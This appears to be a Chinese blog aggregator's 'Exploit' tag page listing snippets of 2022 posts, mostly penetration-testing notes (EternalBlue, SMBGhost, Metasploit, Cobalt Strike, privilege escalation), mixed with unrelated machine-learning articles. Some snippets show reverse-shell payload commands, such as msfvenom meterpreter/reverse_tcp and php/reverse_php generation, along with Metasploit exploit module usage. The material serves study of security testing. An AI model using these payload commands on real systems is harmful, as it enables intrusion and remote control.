Exploit 第11页

Protocol - Exploits学习笔记

Protocol-Exploits注:本分类里内容并非全是协议的bug,部分"基于、使用"这个协议的应用所存在的漏洞也算在其中,例如dns域传送漏洞,其并非dns协议本身的漏洞,为服务部署时的配置问题,

C-haidragon·2022-11-20 04:35

【2017-VCIP】LinkNet: Exploiting Encoder Representations for Efficient Semantic Segmentation

概述像素级语义分割不仅要精度也要速度，现有算法精度有但速度慢。因此本文提出了LinkNet，在不显著增加参数量的情况下进行学习，最后在CamVid数据集上取得了SOTA，Cityscapes数据集上也是类似结果。PaperCode|Pytorch总结创新点：1.编码器和解码器直接相连，共享了学习信息，保留了通常丢失掉的空间信息2.编码器用ResNet18，编解码器参数更少不足：依旧是编解码器分析：

PRSer_Carrot·2022-11-19 19:50

深度学习模型压缩分类及原理方法

代表性的工作有：奇异值分解SVD(NIPS2014)：Exploitinglinearstruc

Mira-Tableau·2022-11-19 09:22

php bypass disable_functions 总结

shell但是却有disable_function限制的题目，一直没有好好搞清楚绕过的方法，今天来一个总结0x00先说一个php7的绕过吧，直接一把梭：（）https://github.com/mm0r1/exploits

kee_ke·2022-11-17 10:26

【漏洞复现】CVE-2020-0796永恒之黑漏洞复现

漏洞检测四、漏洞复现环境五、（1）漏洞利用之蓝屏五、（2）漏洞利用之本地提权五、（3）漏洞利用之反弹shell1、使用msfvenom生成payload2、替换payload3.开启msf监听模块4.运行exploit.py

culprits·2022-11-13 19:21

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell（未成功）可蓝屏

exploit:https://codechina.csdn.net/mirrors/chompie1337/SMBGhost_RCE_PoC?

榜下无名·2022-11-13 19:50

永恒之黑漏洞复现

永恒之黑1.准备工作：测试连通性，并验证漏洞的存在2.利用msfvenom生成payload替换USER_PAYLOAD为用msfvenom生成的payload3.开启MSF进行监听4.执行exploit.py

燕返故人归来·2022-11-13 19:47

DeepExploit——基于强化学习的自动渗透工具

文章目录1.研究背景1.1自动化渗透测试研究背景1.2DeepExploit简介1.3Metasploit简介1.3.1Metasploit渗透步骤——以MS17-010为例1.3.2Metasploit

Zichel77·2022-11-13 11:21

机器学习算法（三十）：强化学习（Reinforcement Learning）

强化学习的主要特点1.3强化学习的组成部分2强化学习训练过程3强化学习算法归类3.1ValueBased3.2PolicyBased3.3Actor-Critic3.4其他分类4EE（Explore&Exploit

意念回复·2022-11-07 08:25

metasploit（十）漏洞攻击exploit代码编写

exploit格式：1.攻击载荷信息块2.需要提供可用目标的列表3.尽量使用exploit()和check()函数，少使用run函数例如以下：require'msf/core'#引入core库的内容classMetasploit3

6321·2022-10-30 18:55

面向初学者的蒙特卡洛树搜索MCTS详解及其实现

目录0.序言1.蒙特卡洛算法的前身今世2.蒙特卡洛搜索算法的原理2.1ExplorationandExploitation（探索与利用）2.2UpperConfidenceBounds（UCB）2.3蒙特卡罗搜索的基本操作

彩虹糖梦·2022-10-30 12:11

攻击者对 Exploit-DB平台的利用分析

如知名漏洞利用平台Exploit-DB中约17.39%的物联网相关漏洞被攻击者利用，且从披露到首次在野利用最短仅需1天。可见，物联网漏洞利用是一种成本低、收益高的攻击

m0_73803866·2022-10-23 12:17

Metasploit学习笔记（六）——Meterpreter后渗透之Hash攻击提权（包含Mimikatz）

1.还是先获取计算机权限针对WIN7，还是用永恒之蓝msfconsoleuseexploit/windows/smb/ms17_010_eternalblue//利用永恒之蓝漏洞setpayloadwindows

Zichel77·2022-10-12 20:11

Socially-Aware Self-Supervised Tri-Training forRecommendation

Theexistingself-supervisedlearning(SSL)methodsmainlyconductself-discriminationbasedcontrastivelearning,whereagivennodecanjustexploittheinformationfromitselfinanotherview.Incontrast

_penghnu·2022-09-26 07:48

C/C++恶意代码盘点之文件自动删除

目录前言1、MoveFileEx重启删除源代码实现2、利用批处理命令删除具体流程源代码实现前言恶意代码的分类包括计算机病毒、蠕虫、木马、后门、Rootkit、流氓软件、间谍软件、广告软件、僵尸(bot)、Exploit

·2022-09-22 03:15

DeepExploit——当Metasploit遇上机器学习

MetasploitMeetsMachineLearning文章目录MetasploitMeetsMachineLearning1.Metasploit准备1.1与外部项目的合作1.1.1启用RPCAPI1.1.2使用RPCAPI操作Metasploit2.创建机器学习模型2.1DQN2.2A3C2.2.1CartPole2.2.2分布式学习机制3.深度利用3.1代理任务3.2当前状态3.2.1O

Zichel77·2022-09-19 07:14

网中人《shell十三问》简体版整理

原文地址：http://bbs.chinaunix.net/thread-218853-1-1.html转载自：https://blog.csdn.net/freexploit/article/details

huayangshiboqi·2022-09-15 18:17

BUG搜集平台及扫描利用

www.cvedetails.com/https://nox.qianxin.com/https://cve.mitre.org/2.漏洞利用工具poc/expPOC:ProofofConceptExp：exploit

路远3306·2022-09-14 14:34

强化学习（第二版）Sutton - 第二章习题答案和解析

A：0.5的概率选择开发（exploitation）

born-in-freedom·2022-09-11 07:32

Cobalt strike 派生shell给MSF

Cobaltstrike派生shell给MSF,前提是要有beaconshell：在msf使用监听模块,并设置相关选项：useexploit/multi/handlesetpayloadwindows/

=(^.^)=哈哈哈·2022-09-10 22:53

CobaltStrike与Metasploit会话相互派生

MSF步骤CS创建Foreign监听器MSF设置监听和同类型payloadCS执行Spawn派生到MSF对应的监听器1.1CS创建Foreign监听器1.1MSF设置监听和同类型payload使用监听器exploit

半只特立独行的猪·2022-09-10 22:21

Cobalt Strike之与msf互相派生shell

一，msf派生shell给cobalstrike1，cs添加监听器2，msf上在已经获取到的会话(shell)中注入一个新的payloadmsfexploit(handler)>useexploit/windows

shy014·2022-09-10 22:51

Cobalt Strike会话管理

CS会话1增加CS会话添加新侦听器在获得的session会话中选择"新建会话（spawn）"：选择新添加的侦听器获取到新的会话2利用CS会话生成MSF会话添加新外部侦听器配置MSF如下msf6>useexploit

f_carey·2022-09-10 22:19

内网渗透中的反弹Shell与端口转发

msfpayloadphp/reverse_phpLHOST=x.x.x.xLPORT=2333R>re.php将文件传入shell中,在msf中开一个handlermsf>usemulti/handlermsfexploit

weixin_30485799·2022-09-02 17:36

后渗透之权限提升(2)

方法1提高程序运行级别提权使用的msf模块（此模块需要用户进行交互）Exploit/windows/local/ask连接收到目标主机之后，获取sessions进入到这个sessions中sessions-i2

凉城木槿·2022-09-02 17:33

后渗透阶之环境准备(1)

生成木马程序msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.2.128lport=4444-fexe>msf.exe开启msfconsole使用exploit

凉城木槿·2022-09-02 17:33

【工具使用】——Metasploit(MSF)使用详解(超详细)

`MSF`中加载自定义的`exploit模块`：3. 漏洞利用(exploit)：4. 攻击载荷(payload)：4.1 payload模块路径：：4.2 Meta

剑客 getshell·2022-08-26 07:03

LinkNet论文笔记

LinkNet论文笔记LinkNet:ExploitingEncoderRepresentationsforEfficientSemanticSegmentationAbstract用于视觉场景理解的像素语义分割不仅需要准确

麻花地·2022-08-23 18:52

Metasploit学习笔记--体系框架梳理

Metasploit体系框架1、基础库文件2、模块2.1辅助模块（Aux）2.2渗透攻击模块（Exploits）2.3攻击载荷模块（Payload）2.4空指令模块（Nops）2.5编码器模块（Encoders

Bluffing·2022-08-22 17:05

Metasploit——渗透攻击模块(Exploit)

Metasploit常用命令、技术功能模块Metasploit——辅助模块(Auxiliary)目录1.Exploit模块2.生成Payload3.Meterpreter常用命令4.弱点扫描1.Exploit

隐身的菜鸟·2022-08-15 00:03

GOOGLE HACKING 系列文章【FreeXploiT整理收集】

本文涉及作者swap（慕容小雨），zhaohuan（Xfocus），snipe（4ngel）信息安全的隐患-GoogleHacking原理和防范作者：[email protected]来源：www.phack.org技术天地：GoogleHacking是利用Google的搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息，最近这种以前由黑客手动进行操作的攻击手段可以通过一种新的蠕虫病毒来自动

这个是心目中喜欢的·2022-08-07 07:55

【网络安全作业】office漏洞检测与利用

目录一、下载与设置1、操作系统下载2、操作系统安装3、脚本及cve文件下载4、文件转存二、操作1、打开metasploit2、查找cve模块3、使用cve模块4、运行-exploit-j5、生成恶意doc

水亦心·2022-08-03 11:24

《Metasploit渗透测试指南》命令参考列表

1.MSF终端命令showexploit列出metasploit框架中的所有渗透攻击模块。showpayloads列出metasploit框架中的所有攻击载荷。

weixin_38169786·2022-07-27 16:36

PhpMyadmin各版本漏洞合集

1.PhpMyAdmin存在PREGREPLACEEVAL漏洞影响版本：3.5.x<3.5.8.1and4.0.0<4.0.0-rc3利用模块：exploit/multi/http/phpmyadminpregreplaceCVE

diaoshi3762·2022-07-27 11:00

Linux提权

提权的命令内核提权内核溢出提权1.获取shell2.查找漏洞3.上传exp脏牛提权MSF提权passwd提权ssh密钥提权提权脚本应用LinEnum软件简介实操linuxprivcheckerlinux-exploit-suggester2docker

lainwith·2022-07-21 18:03

《白帽子讲web安全》第1章我的安全世界观

一、基础知识“Hacker“：黑客“exploit”：黑客们使用的漏洞利用代码“Scriptkids”：脚本小子，只懂得编译别人的代码，自己没有动手能力ACL：访问控制列表XSS：跨站脚本攻击安全问题的本质是信任问题

询昵·2022-07-19 10:06

内网渗透之Windows反弹shell（二）

通过Metasploit的SMBDelivery模块发起Rundll32攻击useexploit/

不知名白帽·2022-07-18 17:09

mysql limit sql注入_LIMIT子句中的盲 SQL注入漏洞利用

原文：https://www.noob.ninja/2019/07/exploiting-tricky-blind-sql-injection.html前言嘿！

烨空·2022-07-09 13:13

windows提权—msf、at、sc提权

windows2k3、xp获取到服务器的meterpreter后，有三个方向getsystem提权可以直接使用getsystem提权没成功绕过UAC策略MSF使用注册表bypassuac提权漏洞模块：exploit

Thgilil·2022-07-09 09:20

MSF自动查找可用提权的EXP

为此，MSF专门提供了一个查找适用EXP的内置模块“LocalExploitSuggester”，如其名字一样，提供EXP建议，我们可以在MSF界面搜索suggester，找到他，并利用。

Nathan8·2022-07-09 09:50

后渗透篇：Windows x64下提权Exploit整理

Windows x64 Local Privilege Escalation0x00前言在CVE-2014-4113出来后,x64环境下的提权又是一片短暂的光明。在此漏洞披露前,PR/IIS溢出/LPK劫持等对64位版本都无效果,网上公开曾有一个Exp有效,代号为MS10048x64。本文谨记录x64下可提权的Exp与测试过程。暂不考虑依赖第三方服务(如MSSQL/MYSQL/FTP)等的提权。

bylfsj·2022-07-08 07:40

111.网络安全渗透测试—[权限提升篇9]—[Windows 2008 R2内核溢出提权]

文章目录一、Windows内核溢出提权[2008]1、内核溢出提权背景：2、CVE-2014-4113-Exploit3、内核溢出提权过程：（1）实验环境：（2）靶机链接：（3）实验过程：附：常见可读写目录一

qwsn·2022-07-07 10:54

Metasploit（msf）利用ms17_010（永恒之蓝）出现Encoding::UndefinedConversionError问题

Metasploit利用ms17_010（永恒之蓝）利用流程先确保目标靶机和kali处于同一网段，可以互相Ping通目标靶机防火墙关闭，开启了445端口输入searchms17_010搜索永恒之蓝漏洞useexploit

慕恒HK·2022-07-05 22:00

系统提权之：Windows 提权

Windows提权1利用漏洞提权1.1手工查找系统缺失补丁1.2Windows补丁审计工具1.2.1Windows-Exploit-Suggester1.2.2Sherlock1.3MSF模块查找可利用漏洞

f_carey·2022-07-05 09:46

PPO-强化学习算法

文章目录QuickFactsKeyEquationsExplorationvs.ExploitationPseudocodeDocumentatonPPO受到与TRPO相同的问题的激励：我们如何才能使用当前拥有的数据在策略上采取最大可能的改进步骤

Mystery_zero·2022-07-05 07:05

GT CS 6262: Network Security

AdvancedWebSecurityFall2021ThelatestChromebrowserishighlyrecommendedforthisprojectObjectivesAttackawebapplicationbyexploitingitsXSSvulnerabilitiestoinfectitsusersasper

·2022-06-24 17:31

redis配置文件中的保护模式protected-mode

Protectedmodeisalayerofsecurityprotection,inordertoavoidthatRedisinstancesleftopenontheinternetareaccessedandexploited.Whenprotectedmode

·2022-06-24 16:21

Metasploitable2 渗透测试（ftp 端口21）

使用auxiliary/scanner/ftp/ftp_version模块，并设置好目标地址，端口采用默认的21，exploit-j开始，查看ftp的版本，版本是vsFTPd2.3.4继续searchvsFTPd

半夜好饿·2022-06-22 17:12

渗透测试学习笔记(Linux基础篇)

Linux基础操作学习exploit-db.com：内核漏洞发布网站内核版本：XX.YY.ZZ（XX代表主版本号，YY代表次版本号，ZZ代表补丁次数）次版本号奇数代表开发版，偶数代表稳定版Linux系统目录结构

脚本实习生·2022-06-09 18:30

kali通过msf利用永恒之蓝攻击服务器

1、通过命令“msfconsole”启动msf，或者通过菜单启动msfmsf模块说明：exploits：攻击模块，利用发现的安全漏洞或配置弱点对远程目标系统进行攻击，从而获得对远程目标系统访问权限的代码组件

songling515010475·2022-06-08 20:30

推荐频道

Exploit